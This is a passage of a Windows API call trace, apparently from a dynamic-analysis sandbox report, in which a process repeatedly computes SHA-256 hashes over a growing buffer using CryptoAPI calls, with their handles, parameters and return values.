	[0226.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277bae8
	[0226.006] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277bae8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277bae8, pdwDataLen=0x1284a8) returned 1
	[0226.006] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.006] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.006] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.006] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.006] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0226.006] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277bb10
	[0226.006] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277bb10, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277bb10, pdwDataLen=0x1284a8) returned 1
	[0226.006] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.006] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.006] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.007] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.007] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0226.007] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.007] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277bb38
	[0226.007] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277bb38, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277bb38, pdwDataLen=0x1284a8) returned 1
	[0226.007] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.007] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.007] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.007] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.007] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0226.007] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.007] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277bb60
	[0226.007] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277bb60, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277bb60, pdwDataLen=0x1284a8) returned 1
	[0226.007] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.007] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.007] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.008] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.008] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0226.008] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277bb88
	[0226.008] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277bb88, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277bb88, pdwDataLen=0x1284a8) returned 1
	[0226.008] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.008] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.008] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.008] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.008] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0226.008] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277bbb0
	[0226.008] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277bbb0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277bbb0, pdwDataLen=0x1284a8) returned 1
	[0226.008] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.008] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.008] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.009] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.009] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0226.009] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277bbd8
	[0226.009] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277bbd8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277bbd8, pdwDataLen=0x1284a8) returned 1
	[0226.009] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.009] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.009] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.009] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.009] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0226.009] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27384e8
	[0226.009] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27384e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27384e8, pdwDataLen=0x1284a8) returned 1
	[0226.009] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.009] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.009] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.010] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.010] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0226.010] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738538
	[0226.010] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2738538, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738538, pdwDataLen=0x1284a8) returned 1
	[0226.010] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.010] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.010] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.010] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.010] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0226.010] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738510
	[0226.010] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738510, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738510, pdwDataLen=0x1284a8) returned 1
	[0226.011] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.011] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.011] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.011] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.011] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0226.011] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738560
	[0226.011] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2738560, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738560, pdwDataLen=0x1284a8) returned 1
	[0226.011] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.011] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.011] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.011] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.011] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0226.012] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738330
	[0226.012] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738330, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738330, pdwDataLen=0x1284a8) returned 1
	[0226.012] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.012] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.012] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.012] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.012] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0226.012] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738358
	[0226.012] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2738358, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738358, pdwDataLen=0x1284a8) returned 1
	[0226.012] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.012] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.012] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.012] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.013] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0226.013] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738380
	[0226.013] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738380, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738380, pdwDataLen=0x1284a8) returned 1
	[0226.013] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.013] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.013] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.013] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.013] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0226.013] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381c8
	[0226.013] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x27381c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27381c8, pdwDataLen=0x1284a8) returned 1
	[0226.013] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.013] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.046] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.046] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.046] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0226.047] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f70
	[0226.047] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737f70, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737f70, pdwDataLen=0x1284a8) returned 1
	[0226.047] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.047] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.047] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.047] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.047] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0226.047] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f98
	[0226.047] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2737f98, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737f98, pdwDataLen=0x1284a8) returned 1
	[0226.047] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.047] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.047] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.048] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.048] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0226.048] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737d90
	[0226.048] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737d90, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737d90, pdwDataLen=0x1284a8) returned 1
	[0226.048] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.048] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.048] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.048] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.048] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0226.048] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c78
	[0226.048] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2737c78, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737c78, pdwDataLen=0x1284a8) returned 1
	[0226.048] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.048] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.048] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.049] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.049] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0226.049] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ca0
	[0226.049] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737ca0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737ca0, pdwDataLen=0x1284a8) returned 1
	[0226.049] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.049] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.049] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.049] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.049] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0226.049] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737cc8
	[0226.049] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2737cc8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737cc8, pdwDataLen=0x1284a8) returned 1
	[0226.049] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.049] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.049] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.050] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.050] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0226.050] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738038
	[0226.050] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738038, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738038, pdwDataLen=0x1284a8) returned 1
	[0226.050] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.050] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.050] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.050] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.050] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0226.050] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738060
	[0226.050] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2738060, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738060, pdwDataLen=0x1284a8) returned 1
	[0226.050] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.050] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.050] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.051] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.051] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0226.051] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738088
	[0226.051] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738088, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738088, pdwDataLen=0x1284a8) returned 1
	[0226.051] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.051] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.051] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.051] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.051] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0226.051] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736788
	[0226.051] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2736788, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736788, pdwDataLen=0x1284a8) returned 1
	[0226.051] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.051] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.051] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.052] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.052] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x940, dwFlags=0x0) returned 1
